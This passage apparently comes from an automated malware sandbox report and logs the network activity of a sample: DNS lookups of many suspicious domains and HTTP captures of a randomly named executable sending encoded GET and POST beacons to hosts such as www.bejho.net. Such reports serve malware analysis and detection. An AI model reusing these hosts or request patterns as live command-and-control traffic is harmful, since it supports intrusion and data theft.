                                                                                Nov 17, 2024 08:36:44.941035032 CET192.168.2.41.1.1.10x1614Standard query (0)www.nieuws-july202541.sbsA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:58.423949957 CET192.168.2.41.1.1.10xfcddStandard query (0)www.bandukchi.comA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:11.737153053 CET192.168.2.41.1.1.10x77f9Standard query (0)www.gcast.videoA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:25.486367941 CET192.168.2.41.1.1.10x496eStandard query (0)www.rtpsilva4d.clickA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:38.877665043 CET192.168.2.41.1.1.10xeadeStandard query (0)www.bearableguy.netA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:53.064559937 CET192.168.2.41.1.1.10x5ff5Standard query (0)www.funddata-x.netA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:06.596693039 CET192.168.2.41.1.1.10x808eStandard query (0)www.s9gzg9.vipA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:19.924885035 CET192.168.2.41.1.1.10xdd23Standard query (0)www.oneid.inkA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:34.135893106 CET192.168.2.41.1.1.10xd88bStandard query (0)www.extrem.techA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:47.705892086 CET192.168.2.41.1.1.10x8e9eStandard query (0)www.everyone.golfA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:39:03.955667973 CET192.168.2.41.1.1.10x1a9cStandard query (0)www.booosted.xyzA (IP address)IN (0x0001)false

                                                                                DNS Answers

                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Nov 17, 2024 08:35:53.825243950 CET1.1.1.1192.168.2.40xc43dNo error (0)www.arcare.partnersarcare.partnersCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:35:53.825243950 CET1.1.1.1192.168.2.40xc43dNo error (0)arcare.partners3.33.130.190A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:35:53.825243950 CET1.1.1.1192.168.2.40xc43dNo error (0)arcare.partners15.197.148.33A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:09.949516058 CET1.1.1.1192.168.2.40x8a2fNo error (0)www.bejho.net64.225.91.73A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:23.493035078 CET1.1.1.1192.168.2.40x9302No error (0)www.jagdud.store209.74.64.187A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:36.885418892 CET1.1.1.1192.168.2.40x5e96Name error (3)www.dagoovis.orgnonenoneA (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:44.990912914 CET1.1.1.1192.168.2.40x1614No error (0)www.nieuws-july202541.sbsnieuws-july202541.sbsCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:44.990912914 CET1.1.1.1192.168.2.40x1614No error (0)nieuws-july202541.sbs162.0.215.33A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:58.437314034 CET1.1.1.1192.168.2.40xfcddNo error (0)www.bandukchi.combandukchi.comCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:58.437314034 CET1.1.1.1192.168.2.40xfcddNo error (0)bandukchi.com3.33.130.190A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:36:58.437314034 CET1.1.1.1192.168.2.40xfcddNo error (0)bandukchi.com15.197.148.33A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:11.959589958 CET1.1.1.1192.168.2.40x77f9No error (0)www.gcast.video98.124.224.17A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:25.509663105 CET1.1.1.1192.168.2.40x496eNo error (0)www.rtpsilva4d.clickrtpsilva4d.clickCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:25.509663105 CET1.1.1.1192.168.2.40x496eNo error (0)rtpsilva4d.click67.223.117.169A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:38.912429094 CET1.1.1.1192.168.2.40xeadeNo error (0)www.bearableguy.netbearableguy.netCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:38.912429094 CET1.1.1.1192.168.2.40xeadeNo error (0)bearableguy.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:38.912429094 CET1.1.1.1192.168.2.40xeadeNo error (0)bearableguy.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:53.121922016 CET1.1.1.1192.168.2.40x5ff5No error (0)www.funddata-x.netfunddata-x.netCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:53.121922016 CET1.1.1.1192.168.2.40x5ff5No error (0)funddata-x.net3.33.130.190A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:37:53.121922016 CET1.1.1.1192.168.2.40x5ff5No error (0)funddata-x.net15.197.148.33A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:06.608757019 CET1.1.1.1192.168.2.40x808eNo error (0)www.s9gzg9.vips9gzg9.vipCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:06.608757019 CET1.1.1.1192.168.2.40x808eNo error (0)s9gzg9.vip3.33.130.190A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:06.608757019 CET1.1.1.1192.168.2.40x808eNo error (0)s9gzg9.vip15.197.148.33A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:19.959871054 CET1.1.1.1192.168.2.40xdd23No error (0)www.oneid.inkghs.googlehosted.comCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:19.959871054 CET1.1.1.1192.168.2.40xdd23No error (0)ghs.googlehosted.com172.217.18.19A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:34.175879002 CET1.1.1.1192.168.2.40xd88bNo error (0)www.extrem.tech13.248.169.48A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:34.175879002 CET1.1.1.1192.168.2.40xd88bNo error (0)www.extrem.tech76.223.54.146A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:47.723491907 CET1.1.1.1192.168.2.40x8e9eNo error (0)www.everyone.golfeveryone.golfCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:47.723491907 CET1.1.1.1192.168.2.40x8e9eNo error (0)everyone.golf3.33.130.190A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:38:47.723491907 CET1.1.1.1192.168.2.40x8e9eNo error (0)everyone.golf15.197.148.33A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:39:03.996607065 CET1.1.1.1192.168.2.40x1a9cNo error (0)www.booosted.xyzbooosted.xyzCNAME (Canonical name)IN (0x0001)false
                                                                                Nov 17, 2024 08:39:03.996607065 CET1.1.1.1192.168.2.40x1a9cNo error (0)booosted.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                                                Nov 17, 2024 08:39:03.996607065 CET1.1.1.1192.168.2.40x1a9cNo error (0)booosted.xyz15.197.148.33A (IP address)IN (0x0001)false

                                                                                HTTP Request Dependency Graph

                                                                                • www.arcare.partners
                                                                                • www.bejho.net
                                                                                • www.jagdud.store
                                                                                • www.nieuws-july202541.sbs
                                                                                • www.bandukchi.com
                                                                                • www.gcast.video
                                                                                • www.rtpsilva4d.click
                                                                                • www.bearableguy.net
                                                                                • www.funddata-x.net
                                                                                • www.s9gzg9.vip
                                                                                • www.oneid.ink
                                                                                • www.extrem.tech
                                                                                • www.everyone.golf
                                                                                • www.booosted.xyz

                                                                                HTTP Packets

                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.4497423.33.130.190803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:35:53.848566055 CET504OUTGET /veiq/?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw= HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.arcare.partners
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:35:54.802305937 CET400INHTTP/1.1 200 OK
                                                                                Server: openresty
                                                                                Date: Sun, 17 Nov 2024 07:35:54 GMT
                                                                                Content-Type: text/html
                                                                                Content-Length: 260
                                                                                Connection: close
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 67 76 79 58 65 3d 45 74 78 54 77 36 4f 70 59 56 70 70 4d 42 26 59 38 69 3d 5a 61 43 49 5a 75 46 6c 37 77 5a 45 70 74 47 72 38 6f 47 51 50 2b 78 62 30 41 2f 4a 33 37 59 71 36 51 43 67 39 62 4f 43 73 57 6e 39 31 69 65 65 46 47 58 47 42 33 55 78 56 53 6f 49 49 48 46 73 2f 52 32 6f 66 65 51 56 30 54 76 65 55 38 57 68 54 36 7a 58 61 74 61 37 30 6b 32 77 55 65 32 53 74 35 37 4f 4f 79 56 4b 67 37 43 48 55 79 41 4b 58 65 31 7a 37 4e 77 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?gvyXe=EtxTw6OpYVppMB&Y8i=ZaCIZuFl7wZEptGr8oGQP+xb0A/J37Yq6QCg9bOCsWn91ieeFGXGB3UxVSoIIHFs/R2ofeQV0TveU8WhT6zXata70k2wUe2St57OOyVKg7CHUyAKXe1z7Nw="}</script></head></html>


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.44979264.225.91.73803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:09.973157883 CET751OUTPOST /zhgj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bejho.net
                                                                                Origin: http://www.bejho.net
                                                                                Referer: http://www.bejho.net/zhgj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 200
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 45 66 30 76 68 35 77 73 31 65 4a 51 54 68 2f 36 42 71 32 5a 78 4f 54 36 39 2f 79 63 6c 75 57 2f 2b 32 43 49 6b 41 31 51 42 79 70 79 4d 67 42 55 34 39 69 2b 33 66 59 46 5a 52 61 33 39 49 46 75 51 4a 44 35 74 57 6c 56 41 5a 70 2b 49 48 41 6c 78 6f 76 37 32 38 36 43 32 43 53 42 76 36 58 31 45 65 76 6d 61 4f 79 6e 70 4d 50 39 71 33 47 69 2f 5a 56 72 38 55 76 74 38 67 51 48 31 61 6e 44 66 43 44 76 68 50 56 41 66 52 75 59 71 35 47 44 46 30 43 66 36 6a 78 6a 7a 31 2f 52 73 4e 41 72 39 42 59 50 6f 70 6b 65 6b 6f 51 53 67 79 35 64 59 4b 76 7a 75 48 6a 68 65 4b 32 2f 49 61 79 7a 65 67 3d 3d
                                                                                Data Ascii: Y8i=Ef0vh5ws1eJQTh/6Bq2ZxOT69/ycluW/+2CIkA1QBypyMgBU49i+3fYFZRa39IFuQJD5tWlVAZp+IHAlxov7286C2CSBv6X1EevmaOynpMP9q3Gi/ZVr8Uvt8gQH1anDfCDvhPVAfRuYq5GDF0Cf6jxjz1/RsNAr9BYPopkekoQSgy5dYKvzuHjheK2/Iayzeg==
                                                                                Nov 17, 2024 08:36:10.638700962 CET601INHTTP/1.1 200 OK
                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                date: Sun, 17 Nov 2024 07:36:10 GMT
                                                                                content-type: text/html
                                                                                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                etag: W/"63f68860-251"
                                                                                content-encoding: gzip
                                                                                connection: close
                                                                                transfer-encoding: chunked
                                                                                Data Raw: 31 35 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 6d 52 c1 6e c2 30 0c bd f3 15 56 4f ad 06 6d a7 69 17 68 bb d3 fe 60 3f d0 b5 ee 12 94 c6 90 b8 20 34 f1 ef 73 52 18 0c ed e6 d8 cf cf cf cf a9 14 8f a6 59 54 0a db be 59 00 54 23 72 0b 8a 79 b7 c2 fd a4 0f 75 e2 70 70 e8 55 02 1d 59 46 cb 75 f2 ba 99 9c a9 03 c6 af 8b c2 d2 d6 e7 3d 8d ad b6 9d 65 47 26 ef 68 4c a0 10 d2 62 66 ad 3e a9 3f 45 72 df 39 bd e3 10 02 18 64 70 c8 4e a3 87 1a 5e 96 a0 85 de 1d 5a 23 af e7 b2 2c 37 11 95 0e 93 ed 58 93 8d d8 53 9a c1 77 cc 03 0c c8 9d 4a 93 ab 8c 47 05 c5 1b 39 fd a5 c8 8b 60 78 82 a3 b6 3d 1d 73 43 5d 1b d8 72 25 6b 65 17 26 80 9c 15 da 54 d6 dc 91 f5 08 75 23 d3 e6 38 df 7a b2 69 f6 08 ed 5b 71 49 60 ff d1 8a fe 50 be 6b 91 99 22 15 9d 23 17 9a ae 1b 04 17 f4 00 32 77 76 a1 81 f2 b6 5e 28 82 c8 88 a5 d5 6a 76 63 4e 02 78 e4 0f 3d 22 4d 1c 9b 4f 37 f3 b2 7b e0 19 d0 c8 3a f7 f3 20 9c d1 93 c1 3c ca 49 93 f7 a0 6a 0d c9 12 62 e2 6f ff af 41 e7 4b fe 9c a5 31 aa 8a eb 29 ab 62 be ae 1c 3b fe a4 1f e5 c9 cd 5c 51 [TRUNCATED]
                                                                                Data Ascii: 150mRn0VOmih`? 4sRYTYT#ryuppUYFu=eG&hLbf>?Er9dpN^Z#,7XSwJG9`x=sC]r%ke&Tu#8zi[qI`Pk"#2wv^(jvcNx="MO7{: <IjboAK1)b;\Q0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                2192.168.2.44980764.225.91.73803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:12.521907091 CET771OUTPOST /zhgj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bejho.net
                                                                                Origin: http://www.bejho.net
                                                                                Referer: http://www.bejho.net/zhgj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 220
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 45 66 30 76 68 35 77 73 31 65 4a 51 53 41 50 36 53 62 32 5a 30 75 54 35 68 76 79 63 7a 65 58 30 2b 32 4f 49 6b 46 4e 36 41 45 5a 79 4e 46 6c 55 37 38 69 2b 79 66 59 46 54 78 61 79 7a 6f 46 78 51 4a 50 48 74 54 64 56 41 5a 39 2b 49 48 51 6c 77 62 48 36 6e 38 36 41 37 69 53 48 72 36 58 31 45 65 76 6d 61 4f 6e 36 70 4d 58 39 71 6e 32 69 74 37 39 6f 30 30 76 79 2f 67 51 48 69 71 6e 50 66 43 44 33 68 4f 49 56 66 54 6d 59 71 38 69 44 46 6d 72 4a 78 6a 78 68 74 46 2b 59 69 38 6f 76 77 42 56 78 68 4b 4d 63 6a 63 4d 79 68 30 6f 48 4a 37 4f 6b 38 48 48 53 44 4e 2f 4c 46 5a 50 36 46 6d 4f 78 54 58 74 4e 4e 4e 77 48 66 6f 6a 6b 66 32 4a 74 73 73 6b 3d
                                                                                Data Ascii: Y8i=Ef0vh5ws1eJQSAP6Sb2Z0uT5hvyczeX0+2OIkFN6AEZyNFlU78i+yfYFTxayzoFxQJPHtTdVAZ9+IHQlwbH6n86A7iSHr6X1EevmaOn6pMX9qn2it79o00vy/gQHiqnPfCD3hOIVfTmYq8iDFmrJxjxhtF+Yi8ovwBVxhKMcjcMyh0oHJ7Ok8HHSDN/LFZP6FmOxTXtNNNwHfojkf2Jtssk=
                                                                                Nov 17, 2024 08:36:13.200416088 CET601INHTTP/1.1 200 OK
                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                date: Sun, 17 Nov 2024 07:36:13 GMT
                                                                                content-type: text/html
                                                                                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                etag: W/"63f68860-251"
                                                                                content-encoding: gzip
                                                                                connection: close
                                                                                transfer-encoding: chunked
                                                                                Data Raw: 31 35 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 6d 52 c1 6e c2 30 0c bd f3 15 56 4f ad 06 6d a7 69 17 68 bb d3 fe 60 3f d0 b5 ee 12 94 c6 90 b8 20 34 f1 ef 73 52 18 0c ed e6 d8 cf cf cf cf a9 14 8f a6 59 54 0a db be 59 00 54 23 72 0b 8a 79 b7 c2 fd a4 0f 75 e2 70 70 e8 55 02 1d 59 46 cb 75 f2 ba 99 9c a9 03 c6 af 8b c2 d2 d6 e7 3d 8d ad b6 9d 65 47 26 ef 68 4c a0 10 d2 62 66 ad 3e a9 3f 45 72 df 39 bd e3 10 02 18 64 70 c8 4e a3 87 1a 5e 96 a0 85 de 1d 5a 23 af e7 b2 2c 37 11 95 0e 93 ed 58 93 8d d8 53 9a c1 77 cc 03 0c c8 9d 4a 93 ab 8c 47 05 c5 1b 39 fd a5 c8 8b 60 78 82 a3 b6 3d 1d 73 43 5d 1b d8 72 25 6b 65 17 26 80 9c 15 da 54 d6 dc 91 f5 08 75 23 d3 e6 38 df 7a b2 69 f6 08 ed 5b 71 49 60 ff d1 8a fe 50 be 6b 91 99 22 15 9d 23 17 9a ae 1b 04 17 f4 00 32 77 76 a1 81 f2 b6 5e 28 82 c8 88 a5 d5 6a 76 63 4e 02 78 e4 0f 3d 22 4d 1c 9b 4f 37 f3 b2 7b e0 19 d0 c8 3a f7 f3 20 9c d1 93 c1 3c ca 49 93 f7 a0 6a 0d c9 12 62 e2 6f ff af 41 e7 4b fe 9c a5 31 aa 8a eb 29 ab 62 be ae 1c 3b fe a4 1f e5 c9 cd 5c 51 [TRUNCATED]
                                                                                Data Ascii: 150mRn0VOmih`? 4sRYTYT#ryuppUYFu=eG&hLbf>?Er9dpN^Z#,7XSwJG9`x=sC]r%ke&Tu#8zi[qI`Pk"#2wv^(jvcNx="MO7{: <IjboAK1)b;\Q0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                3192.168.2.44982264.225.91.73803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:15.063832998 CET10853OUTPOST /zhgj/ HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Accept-Encoding: gzip, deflate, br
                                                                                Host: www.bejho.net
                                                                                Origin: http://www.bejho.net
                                                                                Referer: http://www.bejho.net/zhgj/
                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                Cache-Control: no-cache
                                                                                Connection: close
                                                                                Content-Length: 10300
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Data Raw: 59 38 69 3d 45 66 30 76 68 35 77 73 31 65 4a 51 53 41 50 36 53 62 32 5a 30 75 54 35 68 76 79 63 7a 65 58 30 2b 32 4f 49 6b 46 4e 36 41 48 35 79 4e 7a 70 55 70 66 4b 2b 78 66 59 46 66 52 61 7a 7a 6f 46 34 51 4a 58 44 74 54 5a 2f 41 62 46 2b 4f 6b 49 6c 33 75 37 36 75 38 36 41 6b 79 53 43 76 36 57 2f 45 65 2f 71 61 4f 33 36 70 4d 58 39 71 6c 65 69 6f 5a 56 6f 32 30 76 74 38 67 52 56 31 61 6e 6a 66 43 62 4a 68 4f 4d 46 66 6a 47 59 74 64 65 44 44 56 44 4a 75 54 78 76 73 46 2b 41 69 38 31 78 77 42 59 41 68 4c 34 79 6a 62 6b 79 6c 68 4a 6c 5a 4a 47 6e 39 56 76 4a 58 61 50 55 47 34 72 2f 64 6b 57 47 63 55 78 7a 52 66 4d 36 63 61 61 33 4b 6d 30 33 77 49 69 68 65 47 52 51 4f 2b 37 44 45 77 73 65 74 35 38 55 2f 63 76 2b 2b 51 32 79 33 6e 4c 71 46 32 33 34 78 67 6b 42 56 32 4c 64 53 48 59 49 69 36 57 7a 49 59 4b 2b 6d 43 46 77 6e 52 55 30 43 37 42 38 4a 31 72 53 55 71 5a 65 7a 38 67 51 53 55 35 44 6b 4c 4c 44 44 4e 52 6e 71 76 4c 38 39 42 37 51 78 79 49 61 6c 70 51 68 53 35 48 71 46 75 44 55 4f 38 58 37 64 61 [TRUNCATED]
                                                                                Data Ascii: Y8i=Ef0vh5ws1eJQSAP6Sb2Z0uT5hvyczeX0+2OIkFN6AH5yNzpUpfK+xfYFfRazzoF4QJXDtTZ/AbF+OkIl3u76u86AkySCv6W/Ee/qaO36pMX9qleioZVo20vt8gRV1anjfCbJhOMFfjGYtdeDDVDJuTxvsF+Ai81xwBYAhL4yjbkylhJlZJGn9VvJXaPUG4r/dkWGcUxzRfM6caa3Km03wIiheGRQO+7DEwset58U/cv++Q2y3nLqF234xgkBV2LdSHYIi6WzIYK+mCFwnRU0C7B8J1rSUqZez8gQSU5DkLLDDNRnqvL89B7QxyIalpQhS5HqFuDUO8X7da7CJFJpZBvGuFcT8jIV/WNratCMxKspc//gKoyYoJM/1nDDC61rc9qbJ/dkwznHijFdj18wCmQ3rcZbmSccFXGbipeEoaqJ69VbYyR9KVfrcS9aGb//Z/pse3IfeyehruP+CgWj7qJ0ZUfBaVpcFvNszoASLphkBTAPvywl4Bac3SU3bUQyhKuKjKHpWZmWqDuSQeRsVR21ZaATqBSfl9zFaIRjn/hP3J8DJuma47WjHFI+q5c3qqGk0n6/Q8k6lpBvbwyy8dgen7nCnK5WB+j6Cz8vkrAQwNXHDNc9mI8WRAIX5+wD0YbESZ2PnjBJ0P1ppIefHsC8IHuxdI8Vtd1TUDa6+ogfcaxETNFgKwhR5ftkuVNc2/OhWIuv8B84QTPK2trt/2kaGAGEOs3DA2VXfDSfGqPmmK5nYbQ8t9e8drGozFySn+xaiTw+CIcZImvTZbATAFyJ9Ccmbcrz4i5+ox/umgBvEJu3D/JqStyifscGciXjciTQsZJS9+api/E9FgMP1ETH9P4x0kp7vtzIcu/u0rCPv2W7JeOvCjl4/OSMOT0KObImqeFGdKCIMIJ6OosuQ0JhGAJB3ljH4AyUX7nBORyAgwv02z2jw9jt6sJ8sPVXSoR9jAXHxhtw5aK34qdcWWAaaRJzCkDYXx569TtdZNIQ9fiK [TRUNCATED]
                                                                                Nov 17, 2024 08:36:15.743299961 CET601INHTTP/1.1 200 OK
                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                date: Sun, 17 Nov 2024 07:36:15 GMT
                                                                                content-type: text/html
                                                                                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                etag: W/"63f68860-251"
                                                                                content-encoding: gzip
                                                                                connection: close
                                                                                transfer-encoding: chunked
                                                                                Data Raw: 31 35 30 0d 0a 1f 8b 08 00 00 00 00 00 04 03 6d 52 c1 6e c2 30 0c bd f3 15 56 4f ad 06 6d a7 69 17 68 bb d3 fe 60 3f d0 b5 ee 12 94 c6 90 b8 20 34 f1 ef 73 52 18 0c ed e6 d8 cf cf cf cf a9 14 8f a6 59 54 0a db be 59 00 54 23 72 0b 8a 79 b7 c2 fd a4 0f 75 e2 70 70 e8 55 02 1d 59 46 cb 75 f2 ba 99 9c a9 03 c6 af 8b c2 d2 d6 e7 3d 8d ad b6 9d 65 47 26 ef 68 4c a0 10 d2 62 66 ad 3e a9 3f 45 72 df 39 bd e3 10 02 18 64 70 c8 4e a3 87 1a 5e 96 a0 85 de 1d 5a 23 af e7 b2 2c 37 11 95 0e 93 ed 58 93 8d d8 53 9a c1 77 cc 03 0c c8 9d 4a 93 ab 8c 47 05 c5 1b 39 fd a5 c8 8b 60 78 82 a3 b6 3d 1d 73 43 5d 1b d8 72 25 6b 65 17 26 80 9c 15 da 54 d6 dc 91 f5 08 75 23 d3 e6 38 df 7a b2 69 f6 08 ed 5b 71 49 60 ff d1 8a fe 50 be 6b 91 99 22 15 9d 23 17 9a ae 1b 04 17 f4 00 32 77 76 a1 81 f2 b6 5e 28 82 c8 88 a5 d5 6a 76 63 4e 02 78 e4 0f 3d 22 4d 1c 9b 4f 37 f3 b2 7b e0 19 d0 c8 3a f7 f3 20 9c d1 93 c1 3c ca 49 93 f7 a0 6a 0d c9 12 62 e2 6f ff af 41 e7 4b fe 9c a5 31 aa 8a eb 29 ab 62 be ae 1c 3b fe a4 1f e5 c9 cd 5c 51 [TRUNCATED]
                                                                                Data Ascii: 150mRn0VOmih`? 4sRYTYT#ryuppUYFu=eG&hLbf>?Er9dpN^Z#,7XSwJG9`x=sC]r%ke&Tu#8zi[qI`Pk"#2wv^(jvcNx="MO7{: <IjboAK1)b;\Q0


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                4192.168.2.44983864.225.91.73803604C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Nov 17, 2024 08:36:17.727854967 CET498OUTGET /zhgj/?Y8i=JdcPiMMO58hRVijVJpirz9/V5cix6+KSp2WZxXJhOFhYalpiiMnN1LFcUFae4/RxJfLAk2h1IoFKP2Vwx+6Zjf+Qzw/S6pq9Hcy8Rpyilffl6Uu+pL95yEg=&gvyXe=EtxTw6OpYVppMB HTTP/1.1
                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                Accept-Language: en-us
                                                                                Host: www.bejho.net
                                                                                Connection: close
                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36 FXM/0.2
                                                                                Nov 17, 2024 08:36:18.409260035 CET835INHTTP/1.1 200 OK
                                                                                server: nginx/1.18.0 (Ubuntu)
                                                                                date: Sun, 17 Nov 2024 07:36:18 GMT
                                                                                content-type: text/html
                                                                                content-length: 593
                                                                                last-modified: Wed, 22 Feb 2023 21:25:52 GMT
                                                                                etag: "63f68860-251"
                                                                                accept-ranges: bytes
                                                                                connection: close
